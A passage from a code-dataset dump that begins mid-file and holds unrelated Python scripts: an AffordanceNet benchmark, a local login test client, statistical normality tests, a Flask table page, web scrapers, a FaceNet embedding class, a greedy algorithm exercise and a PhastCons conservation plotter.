scores\n largest_cfd_idx_in_score = np.where(scores==obj_cfd)\n\n # If there is no detection then the container cfd equals 0\n if rois_class_score[0][0] == -1:\n obj_iscontainer = False\n obj_container_cfd = 0.0\n else:\n # Open container idx: bowl(1), cup(6), pan(3)\n if obj_classification_idx == 1 or obj_classification_idx == 3 or obj_classification_idx == 6:\n # print \"Object is classified as an open container\"\n obj_iscontainer = True\n else:\n obj_iscontainer = False\n \n bbox_score_list = scores[largest_cfd_idx_in_score[0][0],:]\n # print \"bbox_score_list sum: \", np.sum(bbox_score_list)\n bbox_container_score_list = np.array([bbox_score_list[1], bbox_score_list[3], bbox_score_list[6]])\n # print \"bbox_container_score_list: \", bbox_container_score_list\n obj_container_cfd = np.max(bbox_container_score_list)\n\n # print \"obj_iscontainer: \", obj_iscontainer\n # print \"obj_container_cfd: \", obj_container_cfd\n\n color_curr_mask, img_out = visualize_mask(im, rois_final, rois_class_score, rois_class_ind, masks, ori_height, ori_width, im_name, thresh=CONF_THRESHOLD)\n\n return obj_iscontainer, obj_container_cfd, color_curr_mask, img_out\n\n\ndef run_affordance_net_map_direct_crop(net, crop_img):\n\n ori_height, ori_width, _ = crop_img.shape\n\n if cfg.TEST.MASK_REG:\n rois_final, rois_class_score, rois_class_ind, masks, scores, boxes = im_detect2(net, crop_img)\n else:\n 1\n\n # print \"rois_final: \", rois_final\n # print \"scores shape: \", scores.shape\n # print \"masks shape: \", masks.shape\n # print \"boxes shape: \", boxes.shape\n # print (\"rois_class_score: \", rois_class_score, rois_class_score.shape)\n # print (\"rois_class_ind: \", rois_class_ind, rois_class_ind.shape)\n \n assert rois_class_score.shape == rois_class_ind.shape\n\n # Use the bounding box with the largest score as the classification result.\n largest_cfd_idx = np.argmax(rois_class_score)\n # print \"largest_cfd_idx: \", largest_cfd_idx\n\n obj_cfd = rois_class_score[largest_cfd_idx][0]\n obj_classification_idx = rois_class_ind[largest_cfd_idx][0]\n\n # If there is no detection then the container cfd equals 0\n if rois_class_score[0][0] == -1:\n obj_iscontainer = False\n obj_container_cfd = 0.0\n # Nothing is detected\n bbox_score_list = []\n else:\n # Find the bounding box in scores\n largest_cfd_idx_in_score = np.where(scores==obj_cfd)\n print (\"largest_cfd_idx_in_score: \", largest_cfd_idx_in_score)\n # Make sure there is only one such box\n assert largest_cfd_idx_in_score[0].shape[0] == 1\n assert largest_cfd_idx_in_score[1].shape[0] == 1\n # Open container idx: bowl(1), cup(6), pan(3)\n if obj_classification_idx == 1 or obj_classification_idx == 3 or obj_classification_idx == 6:\n # print \"Object is classified as an open container\"\n obj_iscontainer = True\n else:\n obj_iscontainer = False\n \n bbox_score_list = scores[largest_cfd_idx_in_score[0][0],:]\n # print \"bbox_score_list sum: \", np.sum(bbox_score_list)\n bbox_container_score_list = np.array([bbox_score_list[1], bbox_score_list[3], bbox_score_list[6]])\n # print \"bbox_container_score_list: \", bbox_container_score_list\n obj_container_cfd = np.max(bbox_container_score_list)\n\n color_curr_mask, img_out, list_bboxes = visualize_mask(crop_img, rois_final, rois_class_score, rois_class_ind, masks, ori_height, ori_width, im_name, thresh=CONF_THRESHOLD)\n\n # print \"obj_iscontainer: \", obj_iscontainer\n # print \"obj_container_cfd: \", obj_container_cfd\n\n return obj_iscontainer, obj_container_cfd, color_curr_mask, img_out, list_bboxes, bbox_score_list, rois_class_score, rois_class_ind\n\n \n\ndef parse_args():\n \"\"\"Parse input arguments.\"\"\"\n parser = argparse.ArgumentParser(description='AffordanceNet demo')\n parser.add_argument('--gpu', dest='gpu_id', help='GPU device id to use [0]',\n default=0, type=int)\n parser.add_argument('--cpu', dest='cpu_mode',\n help='Use CPU mode (overrides --gpu)',\n action='store_true')\n\n args = parser.parse_args()\n\n return args\n\nif __name__ == '__main__':\n cfg.TEST.HAS_RPN = True # Use RPN for proposals\n\n args = parse_args()\n \n \n prototxt = root_path + '/models/pascal_voc/VGG16/faster_rcnn_end2end/test.prototxt'\n caffemodel = os.path.join(root_path, 'pretrained', 'AffordanceNet_200K.caffemodel') \n \n if not os.path.isfile(caffemodel):\n raise IOError(('{:s} not found.\\n').format(caffemodel))\n\n if args.cpu_mode:\n caffe.set_mode_cpu()\n else:\n caffe.set_mode_gpu()\n caffe.set_device(args.gpu_id)\n cfg.GPU_ID = args.gpu_id\n \n # load network\n net = caffe.Net(prototxt, caffemodel, caffe.TEST)\n print ('\\n\\nLoaded network {:s}'.format(caffemodel))\n\n map_dir = \"/home/hongtao/Dropbox/ICRA2021/affnet_benchmark/affnet_map_0726\"\n det_result_dir = \"/home/hongtao/Dropbox/ICRA2021/affnet_benchmark/affnet_map_result_0726\"\n\n # Class\n for class_folder in class_folders:\n class_dir = os.path.join(data_dir, class_folder)\n \n object_folders = os.listdir(class_dir)\n # object_folders = [\"Origami_Pink_Cup\"]\n\n benchmark_objdet_class_dir = os.path.join(det_result_dir, class_folder)\n if os.path.exists(benchmark_objdet_class_dir):\n pass\n else:\n os.mkdir(benchmark_objdet_class_dir)\n\n # Object\n for object_folder in object_folders:\n obj_dir = os.path.join(class_dir, object_folder)\n img_folder = obj_dir # the code needs this parameter to find the image \n img_files = os.listdir(obj_dir)\n \n benchmark_objdet_obj_dir = os.path.join(benchmark_objdet_class_dir, object_folder)\n if os.path.exists(benchmark_objdet_obj_dir):\n pass\n else:\n os.mkdir(benchmark_objdet_obj_dir)\n\n bbox_json = object_folder + \"_bbox.json\"\n json_path = os.path.join(obj_dir, bbox_json)\n rgbd_dir = os.path.join(obj_dir, 'rgbd')\n with open(json_path) as f:\n bbox_dict = json.load(f)\n img_num = 0\n total_img_num = 24\n for (key, value) in bbox_dict.items():\n img_num += 1\n img_name = value[\"filename\"]\n img = cv2.imread(os.path.join(rgbd_dir, img_name))\n\n print (object_folder)\n print (img_name)\n\n img_idx = img_name.split('.')[0]\n\n frame_map_dir = os.path.join(map_dir, img_idx)\n if not os.path.exists(frame_map_dir):\n os.mkdir(frame_map_dir)\n \n img_h = img.shape[0]\n img_w = img.shape[1]\n print (\"img_h, img_w: \", img_h, img_w)\n\n x = value[\"regions\"][0][\"shape_attributes\"][\"x\"]\n y = value[\"regions\"][0][\"shape_attributes\"][\"y\"]\n width = value[\"regions\"][0][\"shape_attributes\"][\"width\"]\n height = value[\"regions\"][0][\"shape_attributes\"][\"height\"]\n\n # print \"x, y: \", x, y\n # print \"width, height: \", width, height\n\n x_1 = max(0, x)\n y_1 = max(0, y)\n\n x_2 = min(x+width, img_w)\n y_2 = min(y+height, img_h)\n\n print (\"x1, x2, y1, y2: {}, {}, {}, {}\".format(x_1, x_2, y_1, y_2))\n crop_img = img[y_1:y_2, x_1:x_2]\n crop_img_name = img_name.split(\".\")[0] + \".crop.png\"\n crop_img_path = os.path.join(benchmark_objdet_obj_dir, crop_img_name)\n cv2.imwrite(crop_img_path, crop_img)\n\n im_name = img_name\n obj_iscontainer, obj_container_cfd, color_curr_mask, img_out, list_bboxes, bbox_score_list, rois_class_score, rois_class_ind = run_affordance_net_map_direct_crop(net, crop_img)\n \n # print \"obj_iscontainer: \", obj_iscontainer\n # print \"obj_container_cfd: \", obj_container_cfd\n \n obj_name = object_folder\n map_filename = obj_name + \".txt\"\n classification_filename = obj_name + \"_classification.txt\"\n map_path = os.path.join(frame_map_dir, map_filename)\n classification_path = os.path.join(frame_map_dir, classification_filename)\n with open(map_path, 'w') as f2:\n writerow = \"container \" + str(obj_container_cfd) + \" 0 1 2 3\" \n f2.write(writerow)\n with open(classification_path, 'w') as f3:\n if obj_iscontainer:\n writerow = \"container\"\n else:\n writerow = \"noncontainer\"\n f3.write(writerow)\n\n img_filename = img_name.split(\".\")[0]\n mask_filename = img_filename + \".mask.png\"\n mask_path = os.path.join(benchmark_objdet_obj_dir, mask_filename)\n cv2.imwrite(mask_path, color_curr_mask)\n objdet_filename = img_filename + \".objdet.png\"\n objdet_path = os.path.join(benchmark_objdet_obj_dir, objdet_filename)\n cv2.imwrite(objdet_path, img_out)\n\n # txt_file = img_filename + \"_running.txt\"\n # with open(os.path.join(benchmark_objdet_obj_dir, txt_file), 'a') as f1:\n # print (\"object folders: \", object_folders, file=f1)\n # print (\"rois_class_score: \", rois_class_score, file=f1)\n # print (\"rois_class_ind: \", rois_class_ind, file=f1)\n # for ab in list_bboxes:\n # print(\"box: \", ab, file=f1)\n # print (\"selected bbox score list: \", bbox_score_list, file=f1)\n # print (\"object container cfd: \", obj_container_cfd, file=f1)\n\n print (\"======\")\n \n assert img_num == total_img_num\n\n # for img_file in img_files:\n # print 'Current img: ', os.path.join(obj_dir, img_file)\n # img_idx = img_file.split('.')[0]\n\n # frame_map_dir = os.path.join(map_dir, img_idx)\n # if not os.path.exists(frame_map_dir):\n # os.mkdir(frame_map_dir)\n\n # im_name = img_file\n # obj_name = object_folder\n # obj_iscontainer, obj_container_cfd, color_curr_mask, img_out = run_affordance_net_map(net, im_name, obj_name)\n # print \"======\"\n # map_filename = obj_name + \".txt\"\n # map_path = os.path.join(frame_map_dir, map_filename)\n # with open(map_path, 'w') as f:\n # writerow = \"container \" + str(obj_container_cfd) + \" 0 1 2 3\" \n # f.write(writerow)\n\n # img_filename = img_file.split(\".\")[0]\n # mask_filename = img_filename + \".mask.png\"\n # mask_path = os.path.join(benchmark_objdet_obj_dir, mask_filename)\n # cv2.imwrite(mask_path, color_curr_mask)\n # objdet_filename = img_filename + \".objdet.png\"\n # objdet_path = os.path.join(benchmark_objdet_obj_dir, objdet_filename)\n # cv2.imwrite(objdet_path, img_out)\n \n \n\n \n \n \n\n\n","sub_path":"tools/affnet_map_benchmark_objdet.py","file_name":"affnet_map_benchmark_objdet.py","file_ext":"py","file_size_in_byte":22191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"536495872","text":"# -*- coding:utf-8 -*-\n# @Time:2020/7/28 9:21\n# @Author:martin\n# @File:login.py.py\n# import requests\n# s = requests.session()\n# 660B8D2D5359FF6F94F8D3345698F88C\n# host = 'http://192.168.138.128:8081/'\n\nclass Login_school(object):\n\n def __init__(self, s):\n self.s = s\n self.host = 'http://192.168.138.128:8081/'\n\n def login(self, usr, pwd):\n url = self.host + '/recruit.students/login/in'\n par = {\n \"account\": usr,\n \"pwd\": pwd\n }\n r = self.s.get(url=url, params=par)\n return r\n\nif __name__ == '__main__':\n import requests\n s = requests.session()\n l = Login_school(s)\n r =l.login(\"admin\", \"660B8D2D5359FF6F94F8D3345698F88C\")\n print(r.text)\n\n","sub_path":"python_script/interface/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"587284658","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu May 6 09:27:49 2021\r\n\r\n@author: Trần Thị Diệu Hiền\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport statsmodels.api as sm\r\nimport math\r\nimport numpy as np\r\nfrom scipy import stats\r\n\r\n\r\n\r\ndata = pd.read_csv(\"C:\\\\Users\\\\DUC-PC\\\\Downloads\\\\data.csv\")\r\nscreen = data['Screen Size']\r\nweight = data['Weight']\r\nbrightness = data[\"Brightness\"]\r\ndef hist_plot(data):\r\n mu = np.mean(data)\r\n sigma = np.std(data)\r\n x = np.linspace(mu - 3*sigma, mu + 3*sigma)\r\n plt.plot(x, stats.norm.pdf(x, mu, sigma), color = 'red')\r\n plt.hist(data, density=True, color = 'pink', edgecolor = 'red')\r\n plt.title(data.name)\r\n plt.show()\r\n\r\n \r\ndef qq_plot(data):\r\n sm.qqplot(data, line ='45', color = 'cyan')\r\n plt.show()\r\n \r\n\r\ndef bartlett(a, b, c):\r\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\r\n print(\"Kiểm định Bartlett:\")\r\n stat, pvalue = stats.bartlett(a, b, c)\r\n print(\"Statistic =\", stat, \"\\n\",\r\n \"p value =\", pvalue)\r\n if pvalue > 0.05:\r\n print(\"Các features đồng nhất về phương sai\")\r\n else:\r\n print(\"Các features không đồng nhất về phương sai\")\r\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\r\n \r\n \r\n\r\ndef levene(a, b, c):\r\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\r\n print(\"Kiểm định Levene:\")\r\n stat, pvalue = stats.levene(a, b, c)\r\n if pvalue > 0.05:\r\n print(\"Các features đồng nhất về phương sai\")\r\n else:\r\n print(\"Các features không đồng nhất về phương sai\")\r\n print(\"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\")\r\n \r\n \r\ndef Shapiro(data):\r\n print(\"Kiểm định Shapiro -\", data.name)\r\n stat, pvalue = stats.shapiro(data)\r\n if pvalue > 0.05:\r\n print(\"Không thể bác bỏ giả thiết H0: Phân phối của dữ liệu là chuẩn\")\r\n else:\r\n print(\"Dữ liệu không tuân theo luật phân phối chuẩn\")\r\n print(\"------------------------------\")\r\n \r\n\r\ndef Kolmogorov(data):\r\n print(\"Kiểm định Kolmogorov -\", data.name)\r\n k, p = stats.kstest(rvs=data, cdf='norm', args=(np.mean(data), np.std(data)))\r\n if p > 0.05:\r\n print(\"Không thể bác bỏ giả thiết H0: Phân phối của dữ liệu là chuẩn\")\r\n else:\r\n print(\"Dữ liệu không tuân theo luật phân phối chuẩn\")\r\n print(\"------------------------------\")\r\n \r\n\r\nhist_plot(screen)\r\nhist_plot(weight)\r\nhist_plot(brightness)\r\nqq_plot(screen)\r\nqq_plot(weight)\r\nqq_plot(brightness)\r\nprint(bartlett(screen, weight, brightness))\r\nprint(Shapiro(screen))\r\nprint(Shapiro(weight))\r\nprint(Shapiro(brightness)) \r\nprint(levene(screen, weight, brightness))\r\nprint(Kolmogorov(screen))\r\nprint(Kolmogorov(weight))\r\nprint(Kolmogorov(brightness)) \r\n\r\n","sub_path":"BT_kiem_dinh.py","file_name":"BT_kiem_dinh.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"214549860","text":"from flask import Flask, render_template\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef user_info():\n user_info = (\n {'first_name': 'Michael', 'last_name': 'Choi'},\n {'first_name': 'John', 'last_name': 'Supsupin'},\n {'first_name': 'Mark', 'last_name': 'Guillen'},\n {'first_name': 'KB', 'last_name': 'Tonel'}\n )\n return render_template(\"table.html\", user = user_info)\n\nif __name__ == \"__main__\":\n app.run(debug = True)","sub_path":"HTML_table/table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"290103754","text":"from bs4 import BeautifulSoup\nimport csv\nimport requests\nimport pandas as pd\n\nstart_url = \"https://en.wikipedia.org/wiki/List_of_brown_dwarfs\"\npage = requests.get(start_url)\nprint(page)\ndef scrape():\n headers = [\"Star\", \"Distance\", \"Mass\", \"Radius\"]\n star_data = []\n\n soup = BeautifulSoup(page.text, 'html.parser')\n\n star_table = soup.find('table')\n temp_list = []\n table_rows = star_table.find_all('tr')\n \n for tr in table_rows:\n td = tr.find_all('td')\n row = [i.text.rstrip() for i in td] \n temp_list.append(row)\n \n Star = []\n Distance =[]\n Mass = []\n Radius =[]\n\n for i in range(1,len(temp_list)):\n Star.append(temp_list[i][0]) \n Distance.append(temp_list[i][5])\n Mass.append(temp_list[i][7]) \n Radius.append(temp_list[i][8]) \n \n \n df2 = pd.DataFrame(list(zip(Star,Distance,Mass,Radius)),columns=['Star','Distance','Mass','Radius'])\n \n print(df2)\n\n df2.to_csv('brown_dwarfs.csv')\n\nscrape()\n","sub_path":"scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"651685640","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport time\ndriver = webdriver.Chrome(\"c:/mychrome/chromedriver.exe\")\n# driver = webdriver.Chrome(\"c:/mychrome/chromedriver.exe\")\n\ndef insta_searching(word): # word 검색\n url = 'https://www.instagram.com/explore/tags/'+word\n return url\n \n \nword = '제주도맛집'\nurl = insta_searching(word)\n# print(url) # 본 url을 통해 스크래핑!\n# driver.get(url)\nfirst = driver.find_element_by_css_selector(\"div._9AhH0\") # 인스타 사진 클릭 후 내용까지 가지고 옴\nfirst.click()\ntime.sleep(2)\ndriver.page_source\n","sub_path":"DeepLearning_class/20.08.06/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"332331093","text":"import tensorflow as tf\nfrom scipy import misc\nfrom core import facenet\nimport numpy as np\nimport os\n\n\nclass Recognition(object):\n \"\"\"\n 人脸分类器,face classification,检测出128D的人脸识别landmarks,embedding\n \"\"\"\n\n # 会话\n _sess = None\n\n def __init__(self):\n\n tf.Graph().as_default()\n # 使用70%的GPU memory\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.7)\n config = tf.ConfigProto(gpu_options=gpu_options, allow_soft_placement=True)\n config.gpu_options.allow_growth = True\n\n self._sess = tf.Session(config=config)\n # Load the model\n facenet.load_model(os.path.join(os.path.abspath(\"\"), 'models/recognition/Casia-WebFace/20180619-160233.pb'))\n # Get input and output tensors\n self.images_placeholder = tf.get_default_graph().get_tensor_by_name(\"input:0\")\n self.embeddings = tf.get_default_graph().get_tensor_by_name(\"embeddings:0\")\n self.phase_train_placeholder = tf.get_default_graph().get_tensor_by_name(\"phase_train:0\")\n self.embedding_size = self.embeddings.get_shape()[1]\n\n def pre_process(self, imgs, image_size=160):\n \"\"\"\n @:brief 图像预处理\n :param imgs: 要预处理的图像list,可以处理多张图像\n :param image_size: 图像resize的大小\n :return: bool 返回预处理之后的图像list\n \"\"\"\n img_list = []\n for img in imgs:\n aligned = misc.imresize(img, (image_size, image_size), interp='bilinear')\n prewhitened = facenet.prewhiten(aligned)\n img_list.append(prewhitened)\n images = np.stack(img_list)\n return images\n\n def forward(self, imgs):\n \"\"\"\n @brief:抽取图片特征\n :param imgs: 图片数据,是一个列表,可以出入多张图片\n :return:\n emb 抽取的特征向量,是一个列表\n \"\"\"\n images = self.pre_process(imgs, image_size=160)\n feed_dict = {self.images_placeholder: images, self.phase_train_placeholder: False}\n emb = self._sess.run(self.embeddings, feed_dict=feed_dict)\n return emb.tolist()\n\n def embedding(self, img):\n \"\"\"\n @brief:提取人脸图片特征点\n :param img: 图片数据\n :return:\n emb 抽取的特征向量,是一个列表\n \"\"\"\n images = self.pre_process([img], image_size=160)\n feed_dict = {self.images_placeholder: images, self.phase_train_placeholder: False}\n emb = self._sess.run(self.embeddings, feed_dict=feed_dict)\n return emb.tolist()[0]\n\n","sub_path":"SAFE_ICPMS/core/recognition.py","file_name":"recognition.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"549966182","text":"#참조 : https://blog.naver.com/ujafratte111/221762699717\n\ndef solution(number, k):\n stack = [number[0]]\n\n for num in number[1:]:\n while len(stack) > 0 and stack[-1] < num and k>0:\n k -=1\n stack.pop()\n stack.append(num)\n\n if k!= 0:\n stack = stack[:-k]\n\n\n answer = \"\".join(stack)\n return answer\n\nnumber = \"4177252841\"\nk = 4\nprint(solution(number,k))","sub_path":"greedy/42883.py","file_name":"42883.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"152734140","text":"#!/usr/bin/env python\n\n\"\"\"\nTime-stamp: <2014-11-14 02:34:09 qqin>\n-d: input one merged Phastcon conservation bw file\n e.g. rsync -avz --progress rsync://hgdownload.soe.ucsc.edu/goldenPath/hg38/phastCons7way/hg38.phastCons7way.bw \n\"\"\"\n# ------------------------------------\n# python modules\n# ------------------------------------\n\nimport os\nimport sys\nimport re\nimport logging\nimport subprocess\nimport math\nimport numpy as np\nfrom optparse import OptionParser\nimport pyBigWig\n# try:\n# from bx.bbi.bigwig_file import BigWigFile\n# except:\n# sys.stderr.write(\"Need bx-python!\")\n# sys.exit()\n\n# ------------------------------------\n# constants\n# ------------------------------------\nlogging.basicConfig(level=20,\n format='%(levelname)-5s @ %(asctime)s: %(message)s ',\n datefmt='%a, %d %b %Y %H:%M:%S',\n stream=sys.stderr,\n filemode=\"w\"\n )\n#bigWigSummary = 'bigWigSummary'\n\n# ------------------------------------\n# Misc functions\n# ------------------------------------\n\nerror = logging.critical\t\t# function alias\nwarn = logging.warning\ndebug = logging.debug\ninfo = logging.info\n\nclass PeakIO:\n \"\"\"IO for peak region information.\n This class can hold peak information from MAT/MA2C/MACS, and\n provide some extra functions:\n 1. filtering functions, filter_pvalue/score/fdr/fold are functions\n to filter the peaks according to pvalue/score/fdr/fold range given\n by the user.\n 2. overlapping functions\n \"\"\"\n def __init__ (self, comment=\"\"):\n \"\"\"Initialization function.\n comment: you can add any comments to the peakIO object like\n whether or not it is from a ChIP-chip or a ChIP-seq\n experiments.\n \"\"\"\n self.peaks = {}\n self.comment = comment\n\n def dup (self):\n \"\"\"return a duplicate peakI.\n \"\"\"\n r = PeakIO(comment=self.comment)\n peaks = self.peaks\n new_peaks = {}\n chrs = list(peaks.keys())\n chrs.sort()\n for chrom in chrs:\n new_peaks[chrom]=[]\n new_peaks[chrom].extend(peaks[chrom])\n r.peaks = new_peaks\n return r\n\n\n def add (self, chromosome, start, end, summit=None,\n score=None, total_p=None,\n pvalue=None, fold_enrichment=None, fdr=None):\n \"\"\"Use this function to add items to PeakIO object.\n items: (peak start,peak end, peak length, peak summit, peak\n score, number of tags/probes in peak region, peak pvalue, peak\n fold_enrichment, fdr) <-- tuple type\n Parameters:\n 1. chromosome\n 2. start\n 3. end\n 4. summit: the highest position for the peak region\n 5. score: the score for peak region\n 6. total_p: total points in peak region. For ChIP-seq, it's\n how many tags in the region; for ChIP-chip, it's the number\n of probes.\n 7. pvalue: -10*log(10,p-value) for peak region\n 8. fold_enrichment: fold enrichment for the region\n 9. fdr: False Discovery Rate for the region\n \"\"\"\n if chromosome not in self.peaks:\n self.peaks[chromosome]=[]\n self.peaks[chromosome].append((start,end,end-start,summit,\n score,total_p,\n pvalue,fold_enrichment,fdr))\n\n def filter_pvalue (self, pvalue_cut_low, pvalue_cut_up=None ):\n \"\"\"Filter peaks in a given pvalue range.\n Note, pvalue is actually -10*log(10,pvalue)\n If pvalue_cut_low and pvalue_cut_up is assigned, the peaks with pvalue in [pvalue_cut_low,pvalue_cut_up).\n \"\"\"\n peaks = self.peaks\n new_peaks = {}\n chrs = list(peaks.keys())\n chrs.sort()\n if pvalue_cut_up:\n for chrom in chrs:\n new_peaks[chrom]=[p for p in peaks[chrom] if p[6] >= pvalue_cut_low and p[6]= pvalue_cut_low]\n if not new_peaks[chrom]: del new_peaks[chrom]\n self.peaks = new_peaks\n\n def filter_score (self, score_low, score_up=None ):\n \"\"\"Filter peaks in a given score range.\n If score_low and score_up is assigned, the peaks with score in [score_low,score_up).\n \"\"\"\n peaks = self.peaks\n new_peaks = {}\n chrs = list(peaks.keys())\n chrs.sort()\n if score_up:\n for chrom in chrs:\n new_peaks[chrom]=[p for p in peaks[chrom] if p[4] >= score_low and p[4]= score_low]\n if not new_peaks[chrom]: del new_peaks[chrom]\n self.peaks = new_peaks\n\n def filter_fold (self, fold_low, fold_up=None ):\n \"\"\"Filter peaks in a given fold enrichment range.\n If fold_low and fold_up is assigned, the peaks with fold in [fold_low,fold_up)\n \"\"\"\n peaks = self.peaks\n new_peaks = {}\n chrs = list(peaks.keys())\n chrs.sort()\n if fold_up:\n for chrom in chrs:\n new_peaks[chrom]=[p for p in peaks[chrom] if p[7] >= fold_low and p[7]= fold_low]\n if not new_peaks[chrom]: del new_peaks[chrom]\n self.peaks = new_peaks\n\n def filter_fdr (self, fdr_up, fdr_low=None ):\n \"\"\"Filter peaks in a given FDR range.\n If fdr_low and fdr_up is assigned, the peaks with fold in (fdr_low,fdr_up]. Otherwise, return the peaks with FDR lower or equal to fdr_up.\n \"\"\"\n peaks = self.peaks\n new_peaks = {}\n chrs = list(peaks.keys())\n chrs.sort()\n if fdr_low:\n for chrom in chrs:\n new_peaks[chrom]=[p for p in peaks[chrom] if p[8] > fdr_low and p[8]<=fdr_up]\n if not new_peaks[chrom]: del new_peaks[chrom]\n else:\n for chrom in chrs:\n new_peaks[chrom]=[p for p in peaks[chrom] if p[8] <= fdr_up]\n if not new_peaks[chrom]: del new_peaks[chrom]\n self.peaks = new_peaks\n\n def sort (self):\n peaks = self.peaks\n chrs = list(peaks.keys())\n chrs.sort()\n for chrom in chrs:\n peaks[chrom].sort(lambda x,y: cmp(x[0],y[0]))\n\n\n def get_chr_names (self):\n \"\"\"Return all the chromosome names stored.\n \"\"\"\n l = set(self.peaks.keys())\n return l\n\n\ndef cmp(a, b):\n return (a > b) - (a < b)\n\n\ndef parse_BED (fhd):\n \"\"\"Parse a tab-delimited bed file\n Return a PeakIO object containing peak regions.\n \"\"\"\n import subprocess\n peaks = PeakIO()\n n=0\n for thisline in fhd:\n n+=1\n if n>5000: ## use top 5000 peak\n break\n thisline = thisline.rstrip()\n if not thisline: continue #return (\"blank\",None,None)\n if thisline.startswith(\"#\"): continue #return (\"comment line\",None,None) # comment line is skipped\n if thisline.startswith(\"track\"): continue\n if thisline.startswith(\"browser\"): continue\n thisfields = thisline.split()\n startpos = max(0,int(thisfields[1]))\n\n peaks.add(thisfields[0],startpos,int(thisfields[2]),1,1,1,1,1,1)\n return peaks\n\ndef extract_phastcons ( bedfile, phasdb, width, pf_res ):\n \"\"\"Extract phastcons scores from a bed file.\n Return the average scores\n \"\"\"\n info(\"read bed file...\")\n bfhd = open(bedfile)\n bed = parse_BED(bfhd)\n bfhd.close()\n # calculate the middle point of bed regions then extend left and right by 1/2 width\n bchrs = list(bed.peaks.keys())\n bchrs.sort()\n\n sumscores = []\n bw = pyBigWig.open(phasdb)\n# info(bw.stats(\"chr1\",632029,636030,type=\"mean\",nBins=100))\n for chrom in bchrs:\n info(\"processing chromosome: %s\" % chrom)\n pchrom = bed.peaks[chrom]\n for i in range(len(pchrom)):\n mid = int((pchrom[i][0]+pchrom[i][1])/2)\n left = int(mid - width/2)\n right = int(mid + width/2)\n\n if left < 0:\n left = 0\n right = int(width)\n# info(type(chrom))\n info(\"%s:%s-%s\" % (chrom, left, right))\n try:\n summarize = bw.stats(chrom, left, right, type=\"mean\", nBins=int(width/pf_res))\n except RuntimeError:\n continue\n# dat = summarize.sum_data / summarize.valid_count\n sumscores.append(summarize)\n\n ## a list with each element is a list of conservation score at the same coordinate\n sumscores = list(map(list, list(zip(*sumscores))))\n\n ## exclude na\n sumscores = [[t2 for t2 in t if t2] for t in sumscores]\n try:\n conscores = [sum(t)/len(t) for t in sumscores]\n except ZeroDivisionError:\n conscores = [0] * (width/pf_res)\n info(conscores)\n return conscores\n\ndef makeBmpFile(avgValues, wd, outimg, h,w, width, pf_res, title, bedlabel):\n\n #creating R file in which to write the rscript which defines the correlation plot\n #create and save the file in the current working directory\n\n ## outimg should be id/prefix, that is, conf.prefix\n fileName = os.path.join(wd, os.path.basename(outimg))\n rFile = open(fileName+'.R','w')\n bmpname = fileName+'.png'\n rscript = 'sink(file=file(\"/dev/null\", \"w\"), type=\"message\")\\n'\n rscript += 'sink(file=file(\"/dev/null\", \"w\"), type=\"output\")\\n'\n # rscript += 'pdf(\"%s\",height=%d,width=%d)\\n' %(bmpname,h,w)\n xInfo = list(range(int(-width/2),int(width/2), int(pf_res)))\n rscript += 'x<-c('+','.join(map(str,xInfo[:-1]))+')\\n' # throw the last point which may be buggy\n for i in range(len(avgValues)):\n avgscores = avgValues[i]\n tmpname = 'y'+str(i)\n rscript += tmpname+'<-c('+','.join(map(str,avgscores[:-1]))+')\\n' # throw the last point which may be buggy\n\n tmplist = []\n for i in range(len(avgValues)):\n tmplist.append( \"y%d\" % i )\n\n rscript += \"ymax <- max(\"+ \",\".join(tmplist) +\")\\n\"\n rscript += \"ymin <- min(\"+ \",\".join(tmplist) +\")\\n\"\n rscript += \"yquart <- (ymax-ymin)/4\\n\"\n rscript += \"png(\\\"%s\\\",height=%d,width=%d, unit='in', res=300, bg=FALSE)\\n\" %(bmpname,h,w)\n rscript += 'plot(x,y0,type=\"l\",col=rainbow(%d)[1],main=\\\"%s\\\",xlab=\"Distance from the Center (bp)\",ylab=\"Average Phastcons\",ylim=c(ymin-yquart,ymax+yquart))\\n' % (len(avgValues),title)\n for i in range(1,len(avgValues)):\n rscript += 'lines(x,y'+str(i)+',col=rainbow(%d)[%d])\\n' % (len(avgValues),i+1)\n rscript += 'abline(v=0)\\n'\n # legend_list = map(lambda x:\"'\"+x+\"'\", bedlabel)\n # rscript += 'legend(\"topright\",c(%s),col=rainbow(%d),lty=c(%s))\\n' % (','.join(legend_list),len(avgValues),','.join(['1']*len(avgValues)))\n rscript += 'dev.off()\\n'\n\n _wh = 85\n thumbname = \"%s_thumb.png\" % fileName\n rscript += \"png(\\\"%s\\\",height=%d,width=%d, unit='px')\\n\" %(thumbname,_wh,_wh)\n rscript += \"par(mar=c(0,0,0,0))\\n\"\n rscript += \"plot(x,y0,type='l',col=rainbow(1)[1],bty='n', lwd=5, xaxs='i', yaxs='i', ann=FALSE, xaxt='n', yaxt='n', bty='n')\\n\"\n rscript += 'dev.off()\\n'\n\n rFile.write(rscript)\n rFile.close()\n #executing the R file and forming the pdf file\n data = 